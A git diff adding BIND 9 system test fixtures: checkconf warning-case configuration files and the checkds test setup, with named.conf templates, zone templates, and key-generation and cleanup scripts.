/dev/null +++ b/bin/tests/system/checkconf/view-class-in1.conf @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "example" in { }; diff --git a/bin/tests/system/checkconf/view-class-in2.conf b/bin/tests/system/checkconf/view-class-in2.conf new file mode 100644 index 0000000..38b356e --- /dev/null +++ b/bin/tests/system/checkconf/view-class-in2.conf @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "example" class1 { }; diff --git a/bin/tests/system/checkconf/warn-dlv-auto.conf b/bin/tests/system/checkconf/warn-dlv-auto.conf new file mode 100644 index 0000000..598edd2 --- /dev/null +++ b/bin/tests/system/checkconf/warn-dlv-auto.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-lookaside auto; +}; diff --git a/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf b/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf new file mode 100644 index 0000000..d274731 --- /dev/null +++ b/bin/tests/system/checkconf/warn-dlv-dlv.example.com.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-lookaside . trust-anchor dlv.example.com; +}; diff --git a/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf b/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf new file mode 100644 index 0000000..47bea02 --- /dev/null +++ b/bin/tests/system/checkconf/warn-dlv-dlv.isc.org.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnssec-lookaside . trust-anchor dlv.isc.org; +}; diff --git a/bin/tests/system/checkconf/warn-geoip-use-ecs.conf b/bin/tests/system/checkconf/warn-geoip-use-ecs.conf new file mode 100644 index 0000000..9b95003 --- /dev/null +++ b/bin/tests/system/checkconf/warn-geoip-use-ecs.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + geoip-use-ecs no; +}; diff --git a/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf b/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf new file mode 100644 index 0000000..0d3139d --- /dev/null +++ b/bin/tests/system/checkconf/warn-kasp-max-zone-ttl.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * The dnssec-policy is not defined. Should also be caught if it is inherited. + */ + +options { + dnssec-policy default; +}; + +zone "example.net" { + type primary; + file "example.db"; + inline-signing yes; + max-zone-ttl 600; +}; diff --git a/bin/tests/system/checkconf/warn-keydir.conf b/bin/tests/system/checkconf/warn-keydir.conf new file mode 100644 index 0000000..7aa4536 --- /dev/null +++ b/bin/tests/system/checkconf/warn-keydir.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * key-directory defined but doesn't exist. + */ +options { + directory "."; +}; + +zone dummy { + type master; + file "xxxx"; + key-directory "test.keydir"; +}; diff --git a/bin/tests/system/checkconf/warn-maxratio1.conf b/bin/tests/system/checkconf/warn-maxratio1.conf new file mode 100644 index 0000000..31af34b --- /dev/null +++ b/bin/tests/system/checkconf/warn-maxratio1.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-ixfr-ratio 101%; +}; diff --git a/bin/tests/system/checkconf/warn-notify-source.conf b/bin/tests/system/checkconf/warn-notify-source.conf new file mode 100644 index 0000000..4d840cc --- /dev/null +++ b/bin/tests/system/checkconf/warn-notify-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + notify-source 10.53.0.1 port 100; +}; diff --git a/bin/tests/system/checkconf/warn-parental-source.conf b/bin/tests/system/checkconf/warn-parental-source.conf new file mode 100644 index 0000000..2bbb34b --- /dev/null +++ b/bin/tests/system/checkconf/warn-parental-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + parental-source 10.53.0.1 port 100; +}; diff --git a/bin/tests/system/checkconf/warn-transfer-source.conf b/bin/tests/system/checkconf/warn-transfer-source.conf new file mode 100644 index 0000000..eb31041 --- /dev/null +++ b/bin/tests/system/checkconf/warn-transfer-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + transfer-source 10.53.0.1 port 100; +}; diff --git a/bin/tests/system/checkds/README b/bin/tests/system/checkds/README new file mode 100644 index 0000000..759c4bd --- /dev/null +++ b/bin/tests/system/checkds/README @@ -0,0 +1,26 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the checkds tests. + +These servers are parent servers: +- ns2 is a primary authoritative server that serves the parent zone for zones + configured in ns9. +- ns4 is the secondary server for ns2. +- ns5 is a primary authoritative server that serves the parent zone for zones + configured in ns9, but this one does not publish DS records (to test cases + where the DS is missing). +- ns6 is an authoritative server for a different zone, to test badly configured + parental agents. +- ns7 is the secondary server for ns5. + +Finally, ns9 is the authoritative server for the various DNSSEC enabled test +domains. diff --git a/bin/tests/system/checkds/clean.sh b/bin/tests/system/checkds/clean.sh new file mode 100644 index 0000000..74bf421 --- /dev/null +++ b/bin/tests/system/checkds/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f dig.out* +rm -f ns*/named.conf ns*/named.memstats ns*/named.run* +rm -f ns*/*.jnl ns*/*.jbk +rm -f ns*/K*.private ns*/K*.key ns*/K*.state +rm -f ns*/dsset-* +rm -f ns*/*.db ns*/*.jnl ns*/*.jbk ns*/*.db.signed ns*/*.db.infile +rm -f ns*/keygen.out.* ns*/settime.out.* ns*/signer.out.* +rm -f ns*/managed-keys.bind* +rm -f ns*/*.mkeys +rm -f ns*/zones +rm -f *.checkds.out diff --git a/bin/tests/system/checkds/ns2/named.conf.in b/bin/tests/system/checkds/ns2/named.conf.in new file mode 100644 index 0000000..44a5776 --- /dev/null +++ b/bin/tests/system/checkds/ns2/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "checkds" { + type primary; + file "checkds.db"; +}; diff --git a/bin/tests/system/checkds/ns2/setup.sh b/bin/tests/system/checkds/ns2/setup.sh new file mode 100644 index 0000000..57c7f0a --- /dev/null +++ b/bin/tests/system/checkds/ns2/setup.sh @@ -0,0 +1,34 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns2/setup.sh" + +for subdomain in dspublished reference missing-dspublished bad-dspublished \ + multiple-dspublished incomplete-dspublished bad2-dspublished \ + dswithdrawn missing-dswithdrawn bad-dswithdrawn \ + multiple-dswithdrawn incomplete-dswithdrawn bad2-dswithdrawn +do + cp "../ns9/dsset-$subdomain.checkds$TP" . +done + +zone="checkds" +infile="checkds.db.infile" +zonefile="checkds.db" + +CSK=$($KEYGEN -k default $zone 2> keygen.out.$zone) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -g -z -x -s now-1h -e now+30d -o $zone -O full -f $zonefile $infile > signer.out.$zone 2>&1 diff --git a/bin/tests/system/checkds/ns2/template.db.in b/bin/tests/system/checkds/ns2/template.db.in new file mode 100644 index 0000000..ede62ef --- /dev/null +++ b/bin/tests/system/checkds/ns2/template.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA secondary.example. hostmaster.example. ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns2 +ns2 A 10.53.0.2 + +dspublished NS ns9.dspublished +reference NS ns9.reference +missing-dspublished NS ns9.missing-dspublished +bad-dspublished NS ns9.bad-dspublished +multiple-dspublished NS ns9.multiple-dspublished +incomplete-dspublished NS ns9.incomplete-dspublished +bad2-dspublished NS ns9.bad2-dspublished + +dswithdrawn NS ns9.dswithdrawn +missing-dswithdrawn NS ns9.missing-dswithdrawn +bad-dswithdrawn NS ns9.bad-dswithdrawn +multiple-dswithdrawn NS ns9.multiple-dswithdrawn +incomplete-dswithdrawn NS ns9.incomplete-dswithdrawn +bad2-dswithdrawn NS ns9.bad2-dswithdrawn + diff --git a/bin/tests/system/checkds/ns4/named.conf.in b/bin/tests/system/checkds/ns4/named.conf.in new file mode 100644 index 0000000..b5421eb --- /dev/null +++ b/bin/tests/system/checkds/ns4/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "checkds" { + type secondary; + file "checkds.db"; + primaries { 10.53.0.2 port @PORT@; }; +}; diff --git a/bin/tests/system/checkds/ns5/named.conf.in b/bin/tests/system/checkds/ns5/named.conf.in new file mode 100644 index 0000000..baab6be --- /dev/null +++ b/bin/tests/system/checkds/ns5/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "checkds" { + type primary; + file "checkds.db"; +}; diff --git a/bin/tests/system/checkds/ns5/setup.sh b/bin/tests/system/checkds/ns5/setup.sh new file mode 100644 index 0000000..79d7b71 --- /dev/null +++ b/bin/tests/system/checkds/ns5/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns5/setup.sh" + +zone="checkds" +infile="checkds.db.infile" +zonefile="checkds.db" + +CSK=$($KEYGEN -k default $zone 2> keygen.out.$zone) +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +$SIGNER -S -g -z -x -s now-1h -e now+30d -o $zone -O full -f $zonefile $infile > signer.out.$zone 2>&1 diff --git a/bin/tests/system/checkds/ns5/template.db.in b/bin/tests/system/checkds/ns5/template.db.in new file mode 100644 index 0000000..ac3eb8e --- /dev/null +++ b/bin/tests/system/checkds/ns5/template.db.in @@ -0,0 +1,38 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA secondary.example. hostmaster.example. ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns5 +ns5 A 10.53.0.5 + +dspublished NS ns9.dspublished +reference NS ns9.reference +missing-dspublished NS ns9.missing-dspublished +bad-dspublished NS ns9.bad-dspublished +multiple-dspublished NS ns9.multiple-dspublished +incomplete-dspublished NS ns9.incomplete-dspublished +bad2-dspublished NS ns9.bad2-dspublished + +dswithdrawn NS ns9.dswithdrawn +missing-dswithdrawn NS ns9.missing-dswithdrawn +bad-dswithdrawn NS ns9.bad-dswithdrawn +multiple-dswithdrawn NS ns9.multiple-dswithdrawn +incomplete-dswithdrawn NS ns9.incomplete-dswithdrawn +bad2-dswithdrawn NS ns9.bad2-dswithdrawn + diff --git a/bin/tests/system/checkds/ns6/named.conf.in b/bin/tests/system/checkds/ns6/named.conf.in new file mode 100644 index 0000000..53d3a16 --- /dev/null +++ b/bin/tests/system/checkds/ns6/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "foo" { + type primary; + file "foo.db"; +}; diff --git a/bin/tests/system/checkds/ns7/named.conf.in b/bin/tests/system/checkds/ns7/named.conf.in new file mode 100644 index 0000000..a3e3e15 --- /dev/null +++ b/bin/tests/system/checkds/ns7/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS7 + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "checkds" { + type secondary; + file "checkds.db"; + primaries { 10.53.0.5 port @PORT@; }; +}; diff --git a/bin/tests/system/checkds/ns9/named.conf.in b/bin/tests/system/checkds/ns9/named.conf.in new file mode 100644 index 0000000..0899f8a --- /dev/null +++ b/bin/tests/system/checkds/ns9/named.conf.in @@ -0,0 +1,218 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS9 + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +parental-agents "ns2" port @PORT@ { + 10.53.0.2; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +/* + * Zone with parental agent configured, due for DS checking. + */ +zone "dspublished.checkds" { + type primary; + file "dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { 10.53.0.2 port @PORT@; }; +}; + +/* + * Zone with parental agent configured, due for DS checking. + * Same as above, but now with a reference to parental-agents. + */ +zone "reference.checkds" { + type primary; + file "reference.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { "ns2"; }; +}; + +/* + * Zone with parental agent configured, due for DS checking. + * The parental agent does not have the DS yet. + */ +zone "missing-dspublished.checkds" { + type primary; + file "missing-dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { + 10.53.0.5 port @PORT@; // missing + }; +}; + + +/* + * Zone with parental agent configured, due for DS checking. + * This case, the server is badly configured. + */ +zone "bad-dspublished.checkds" { + type primary; + file "bad-dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { + 10.53.0.6 port @PORT@; // bad + }; +}; + +/* + * Zone with multiple parental agents configured, due for DS checking. + * All need to have the DS before the rollover may continue. + */ +zone "multiple-dspublished.checkds" { + type primary; + file "multiple-dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { + 10.53.0.2 port @PORT@; + 10.53.0.4 port @PORT@; + }; +}; + +/* + * Zone with multiple parental agents configured, due for DS checking. + * All need to have the DS before the rollover may continue. + * This case, one server is still missing the DS. + */ +zone "incomplete-dspublished.checkds" { + type primary; + file "incomplete-dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { + 10.53.0.2 port @PORT@; + 10.53.0.4 port @PORT@; + 10.53.0.5 port @PORT@; // missing + }; +}; + + +/* + * Zone with multiple parental agents configured, due for DS checking. + * All need to have the DS before the rollover may continue. + * This case, one server is badly configured. + */ +zone "bad2-dspublished.checkds" { + type primary; + file "bad2-dspublished.checkds.db"; + inline-signing yes; + dnssec-policy "default"; + parental-agents { + 10.53.0.2 port @PORT@; + 10.53.0.4 port @PORT@; + 10.53.0.6 port @PORT@; // bad + }; +}; + +// TODO: Other test cases: +// - Test with bogus response +// - check with TSIG +// - check with TLS + + +/* + * Zones that are going insecure (test DS withdrawn polling). + */ +zone "dswithdrawn.checkds" { + type primary; + file "dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { 10.53.0.5 port @PORT@; }; +}; + +zone "missing-dswithdrawn.checkds" { + type primary; + file "missing-dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { + 10.53.0.2 port @PORT@; // still published + }; +}; + +zone "bad-dswithdrawn.checkds" { + type primary; + file "bad-dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { + 10.53.0.6 port @PORT@; // bad + }; +}; + +zone "multiple-dswithdrawn.checkds" { + type primary; + file "multiple-dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { + 10.53.0.5 port @PORT@; + 10.53.0.7 port @PORT@; + }; +}; + +zone "incomplete-dswithdrawn.checkds" { + type primary; + file "incomplete-dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { + 10.53.0.2 port @PORT@; // still published + 10.53.0.5 port @PORT@; + 10.53.0.7 port @PORT@; + }; +}; + +zone "bad2-dswithdrawn.checkds" { + type primary; + file "bad2-dswithdrawn.checkds.db"; + inline-signing yes; + dnssec-policy "insecure"; + parental-agents { + 10.53.0.5 port @PORT@; + 10.53.0.7 port @PORT@; + 10.53.0.6 port @PORT@; // bad + }; +}; diff --git a/bin/tests/system/checkds/ns9/setup.sh b/bin/tests/system/checkds/ns9/setup.sh new file mode 100644 index 0000000..0990fa3 --- /dev/null +++ b/bin/tests/system/checkds/ns9/setup.sh @@ -0,0 +1,63 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. ../../conf.sh + +echo_i "ns9/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + echo "$zone" >> zones +} + +# Short environment variable names for key states and times. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" +T="now-30d" +Y="now-1y" + +# DS Publication. +for zn in dspublished reference missing-dspublished bad-dspublished \ + multiple-dspublished incomplete-dspublished bad2-dspublished +do + setup "${zn}.checkds" + cp template.db.in "$zonefile" + keytimes="-P $T -P sync $T -A $T" + CSK=$($KEYGEN -k default $keytimes $zone 2> keygen.out.$zone) + $SETTIME -s -g $O -k $O $T -r $O $T -z $O $T -d $R $T "$CSK" > settime.out.$zone 2>&1 + cat template.db.in "${CSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +done + +# DS Withdrawal. +for zn in dswithdrawn missing-dswithdrawn bad-dswithdrawn multiple-dswithdrawn \ + incomplete-dswithdrawn bad2-dswithdrawn +do + setup "${zn}.checkds" + cp template.db.in "$zonefile" + keytimes="-P $Y -P sync $Y -A $Y" + CSK=$($KEYGEN -k default $keytimes $zone 2> keygen.out.$zone) + $SETTIME -s -g $H -k $O $T -r $O $T -z $O $T -d $U $T "$CSK" > settime.out.$zone 2>&1 + cat template.db.in "${CSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +done diff --git a/bin/tests/system/checkds/ns9/template.db.in b/bin/tests/system/checkds/ns9/template.db.in new file mode 100644 index 0000000..cf06015 --- /dev/null +++ b/bin/tests/system/checkds/ns9/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns9 +ns9 A 10.53.0.9 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/checkds/prereq.sh b/bin/tests/system/checkds/prereq.sh new file mode 100644 index 0000000..2204695 --- /dev/null +++ b/bin/tests/system/checkds/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: 